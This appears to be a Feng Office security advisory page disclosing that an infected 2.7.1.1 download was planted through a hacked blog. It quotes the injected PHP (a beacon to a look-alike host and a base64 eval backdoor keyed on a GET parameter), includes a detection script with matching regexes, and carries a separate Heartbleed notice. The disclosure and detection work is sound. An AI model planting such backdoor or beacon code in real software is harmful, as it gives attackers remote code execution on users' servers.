Community Edition: please update your installation to the latest version. Version 2.7.1.1 could be infected

11/20/2014

 
A few weeks ago our blog was hacked with one concrete purpose: to modify the download link for what was the latest released version.
 
This resulted in some users downloading an infected copy of Feng Office version 2.7.1.1
 

Affected installations

The modified link changed the download destination to a file the attacker had uploaded to our site, containing an infected version 2.7.1.1 of the Community Edition.
 
Installations running a different version, or a 2.7.1.1 downloaded from Sourceforge are not affected.
 

Recommended Measures

The most effective way to be 100% sure your installation is clean is to download and update to the latest version.
 

The attack

The infected version was uploaded, and a fake download link was put on our website, making use of an exploit on our blog engine (WordPress).
 
We have since removed all infected files from our website, and fixed the Apache settings that allowed the exploit.
 
The infection was introduced in the files “init.php” and “environment/environment.php”, on line 22. The injected code looks like this:

In init.php:

// injected: sends this installation's host name and request path to an external server
file_get_contents('http://sourceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
// injected: executes arbitrary PHP supplied base64-encoded in the "lal" query parameter
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));

 
In environment.php:

if(!ini_get('session.auto_start') || (strtolower(ini_get('session.auto_start')) == 'off')) {

    if ( !isset($_GET['avoid_session']) || (isset($_GET['avoid_session']) && !$_GET['avoid_session']) ){
        session_start(); // Start the session
    }
}

// injected: beacon to an external server, as in init.php
file_get_contents('http://sourrceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);

include_once ENVIRONMENT_PATH . '/classes/Env.class.php';

...
// injected: remote-eval backdoor, as in init.php
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));

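As an added check (this is not code from the Feng Office project or from the post), the following shell script searches an installation directory for the two injected constructs quoted above. The regular expressions, the function names and the constructed sample tree are assumptions made for this example: the patterns flag any eval() fed from a request parameter and any file_get_contents() of a remote URL that embeds HTTP_HOST or REQUEST_URI, so variants with a different host or parameter name are reported as well.

```shell
#!/bin/sh
# Added example, not Feng Office's own code: scan a PHP install for the two
# injected constructs quoted in the post above.
#   1. beacon:  file_get_contents('http://.../raport.php?site='.$_SERVER['HTTP_HOST']...)
#   2. backdoor: if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));
# Both regexes are deliberately generic (any host, any parameter name).

# scan_for_backdoor DIR
# Prints every matching file:line:text and returns 1 if anything matched, 0 if clean.
scan_for_backdoor() {
    dir="$1"
    # Pattern 1: eval() fed directly from a request parameter, optionally via base64_decode()
    eval_pat='eval\((base64_decode\()?\$_(GET|POST|REQUEST|COOKIE)\['
    # Pattern 2: file_get_contents() of an http(s) URL that leaks HTTP_HOST or REQUEST_URI
    # ("." stands in for the quote character so the pattern can stay single-quoted)
    beacon_pat='file_get_contents\(.https?://.*\$_SERVER\[.(HTTP_HOST|REQUEST_URI)'
    # find + grep -H works on GNU and BSD; find's exit status is not a reliable
    # "no matches" signal with -exec ... +, so decide on the captured output instead.
    hits=$(find "$dir" -name '*.php' -exec grep -HnE -e "$eval_pat" -e "$beacon_pat" {} + 2>/dev/null) || true
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 1
    fi
    return 0
}

# make_sample_tree
# Builds a constructed fixture (not real Feng Office files): one file carrying the
# injected init.php lines from the post and one clean file. Prints the directory.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/environment"
    cat > "$d/init.php" <<'EOF'
<?php
file_get_contents('http://sourceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));
EOF
    cat > "$d/environment/environment.php" <<'EOF'
<?php
session_start(); // clean: no beacon, no eval
EOF
    printf '%s\n' "$d"
}

# Usage: sh scan_feng.sh /path/to/feng_office
# With no argument, the constructed sample tree is scanned instead.
if [ -n "${1:-}" ]; then
    scan_for_backdoor "$1"
else
    sample=$(make_sample_tree)
    scan_for_backdoor "$sample" || echo "== injected lines found (exit status 1) =="
    rm -rf "$sample"
fi
```

Run it against the web root of a 2.7.1.1 installation. Every hit should be compared with the same file in a clean copy from SourceForge, because the beacon pattern is a heuristic and a legitimate call could match it. A clean tree returns 0 and an infected one prints the offending file:line and returns 1, so the function can also be used from a cron job or a deployment check.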

 
We would like to thank the two users who detected the issue and reported it to our team.
 
We should have been quicker to process the reports and to issue this post. Please accept our apologies for not being faster to publish this information, especially if your installation was affected.
 
Hopefully we will handle it better if a similar attack happens again.
 
Also, if you download the Community Edition, please make sure to download it through Sourceforge, which is still our official channel for distributing the Community Edition.
 

Heartbleed bug mitigation measures

04/14/2014


Dear Everyone,

By now you might have heard about the Internet bug Heartbleed, which has impacted most companies on the web.
Without getting too technical, Heartbleed affects the OpenSSL library used by many online businesses to privately send data to and from Internet servers. Further information about this issue can be found here: http://heartbleed.com/
 
That being said, we would like to announce that Feng Office took immediate and proactive steps to patch this security hole on all servers vulnerable to this risk, and has successfully eliminated any risk of unauthorized access to your account.

Technically, there is no way of knowing whether a server was compromised in the short period between the vulnerability being made public and the Feng Office Security Team patching all systems. For this reason, and to ensure the protection of your information, we strongly suggest you change your password by doing the following:
1- Click on your name (top right corner)
2- Select Account
3- On the right side, below Actions, select Change Password
4- Type in your old password and a new one
5- Save the changes

If you are subscribed to a Feng OnSite plan – which means running Feng Office on your own servers – and would like an assessment of how to deal with this issue, please do not hesitate to contact your Feng Office Account Executive for further information about it and about how to get this very important security issue solved.

Best regards,
Feng Office Team